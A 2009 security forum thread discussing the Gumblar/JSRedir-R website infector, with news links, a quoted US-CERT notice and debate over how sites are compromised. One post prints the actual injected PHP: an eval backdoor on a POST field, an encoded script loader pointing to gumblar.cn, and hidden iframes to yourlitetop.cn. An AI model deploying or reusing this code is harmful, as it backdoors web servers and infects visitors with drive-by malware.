JSRedir-R

Printable View

May 16th, 2009, 04:46 PM
nihil

JSRedir-R

Nothing terribly special about this website infector other than its phenomenal penetration in a very short space of time:

http://www.telegraph.co.uk/sciencean...y-experts.html

:eek:

More here:

http://tech.yahoo.com/news/pcworld/2...rgetingmalware
May 18th, 2009, 07:18 PM
The-Spec

So is it an automated attack on web applications? It sounds like a worm is spreading through sql injection and remote file inclusion flaws and this script is the payload. But it doesn't give any detail about what web applications are being hit.

http://www.zone-h.org/mirror/id/8870521
May 20th, 2009, 05:45 PM
ByTeWrangler

sigh.. there are still so many servers out there which are infect by automated piece of code.. amazing..
May 20th, 2009, 07:45 PM
Cheap Scotch Ron

Quote:

But it doesn't give any detail about what web applications are being hit.

See Nihil's second url/link...

Quote:

The attack code has largely gone after PDF and Flash flaws discovered in the last year (such as APSA08-01 and APSB08-11), according to the company's spokesperson. Such attacks typically go after browser plugins installed by software and don't require opening or downloading anything, but these particular assaults can be largely neutered by making sure you have the latest versions of the Adobe software.

One of the explanatory blog posts from ScanSafe also describes using old MDAC exploits as well, so be sure you're up to date on Microsoft updates also. The PDF attack approach is more bad news for Adobe, whose programs have become a favorite target of late.

Successful attacks will attempt to install malware that manipulates Google search result pages when viewed by Internet Explorer. Victims may see fake results that will redirect them to fradulent sites. To spread itself further, the malware will also attempt to steal FTP logins and hijack any Web sites controlled by an infected PC.
May 20th, 2009, 07:55 PM
nihil

Yes,

US-CERT say this:

Gumblar Malware Exploit Circulating

added May 18, 2009 at 12:47 pm
US-CERT is aware of public reports of a malware exploit circulating. This is a drive-by-download exploit with multiple stages and is being referred to as Gumblar. The first stage of this exploit attempts to compromise legitimate websites by injecting malicious code into them. Reports indicate that these website infections occur primarily through stolen FTP credentials but may also be compromised through poor configuration settings, vulnerable web applications, etc. The second stage of this exploit occurs when users visit a website compromised by Gumblar. Users who visit these compromised websites and have not applied updates for known PDF and Flash Player vulnerabilities may become infected with malware. This malware may be used by attackers to monitor network traffic and obtain sensitive information, including FTP and login credentials, that can be used to conduct further exploits. Additionally, this malware may also redirect Google search results for the infected user.
May 21st, 2009, 02:59 AM
The-Spec

Quote:

See Nihil's second url/link

That had absolutely nothing to do with what I was talking about.

Quote:

The first stage of this exploit attempts to compromise legitimate websites by injecting malicious code into them. Reports indicate that these website infections occur primarily through stolen FTP credentials but may also be compromised through poor configuration settings, vulnerable web applications, etc.

Agian, it could be someone spreading the exploit on XSSable pages that allow javascript to be posted up. Or it could be a full on worm that spreads via remote file inclusion. They give no detailed information at all about this except for the fact that someone sandwiched together exploits for browser extensions.
May 21st, 2009, 09:30 AM
nihil

This is neither an XSS exploit nor a worm, and although some pundits describe it as a trojan, it isn't one of those either.

Basically there is a bot that scans the internet looking for vulnerable websites into which it can inject javascript. As no security researcher has yet obtained a copy of this bot, it is unclear what vulnerabilities are being targeted. The speed at which this malware has spread by comparison to its peers would suggest that it uses multiple vulnerabilities.

The second part is pretty straightforward. You visit a compromised website and pick up a drive-by infection.

Apparently the latest version of the bot uses heavily obfuscated javascript which makes each site's infection virtually unique.
:)
May 21st, 2009, 12:46 PM
t34b4g5

Greetz.

Here's a example of the script that is being used. Prease be careful. ;)

In other words *DO NOT EVEN BOTHER OPENING "hXXp://yourlitetop.cn" IN YOUR BROWSER*

Code:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbih0KXtldmFsKHVuZXNjYXBlKCgndmFyJjIwYSYzZCYyMlNjJjcyaXB0RW4mNjcmNjluZSYyMiYyYyY2MiYzZCYyMlZlJjcyc2kmNmZuKCYyOSsmMjImMmNqJjNkJjIyJjIyJjJjdSYzZCY2ZWEmNzYmNjlnYXRvciYyZSY3NXNlckFnZW4mNzQmM2JpJjY2KCYyOHUmMmVpbmQmNjV4T2YmMjgmMjImNTdpbiYyMikmM2UwJjI5JjI2JjI2KHUmMmUmNjluZGUmNzhPZigmMjJOVCYyMDYmMjIpJjNjJjMwKSYyNiYyNiYyOCY2NG8mNjN1JjZkZW50JjJlY29va2llJjJlJjY5biY2NCY2NXhPZigmMjJtaWVrJjNkMSYyMikmM2MmMzApJjI2JjI2KCY3NHlwZW8mNjYoeiY3MnYmN2F0JjczKSYyMSYzZHQmNzkmNzAmNjVvJjY2KCYyMiY0MSYyMiYyOSkpJjdienJ2JjdhJjc0cyYzZCYyMkEmMjImM2JldmFsKCYyMmlmKHdpbiY2NG93JjJlJjIyK2EmMmImMjIpJjZhJjNkaismMjIrYSYyYiYyMk1ham9yJjIyK2ImMmJhJjJiJjIyTWkmNmVvciYyMitiK2EmMmImMjJCdWlsZCYyMismNjImMmImMjImNmEmM2ImMjImMjkmM2JkJjZmY3VtZW4mNzQmMmUmNzcmNzJpdGUmMjgmMjImM2MmNzNjcmlwdCYyMHMmNzJjJjNkJjJmJjJmZ3VtYmxhciYyZWNuJjJmJjcyc3MmMmYmM2ZpZCYzZCYyMismNmErJjIyJjNlJjNjJjVjJjJmc2NyaSY3MHQmM2UmMjIpJjNiJjdkJykucmVwbGFjZSh0LCclJykpKX0pKC8mL2cpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title><iframe src="http://yourlitetop.cn/ts/in.cgi?mozila9" width=2 height=4 style="visibility: hidden"></iframe>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php ***ORIGINAL PAGE'S CONTENT REMAINED HERE*** echo "<iframe src=\"http://nyoflak15041F8\" width=1 height=1 style=\"visibility:hidden;position

]
and this in a number of .htm files:

Code:

<script language=javascript></script><body><iframe src="http://yourlitetop.cn/ts/in.cgi?mozila9" width=2 height=4 style="visibility: hidden"></iframe>
May 22nd, 2009, 08:06 PM
nihil

Hi t34b4g5,

Are you sure? that looks more like an Iframe injection than javascript redirection?

There is an analysis at Unmaskparasites:

http://blog.unmaskparasites.com/2009...jected-script/

And:

http://blog.unmaskparasites.com/2009...mblar-exploit/

JSRedir-F redirected to Grumblar.cn and more recently to Martuz.cn

yourlitetop.cn seems to be associated with Win32.Heur, rather than a JS redirect & browser hijack?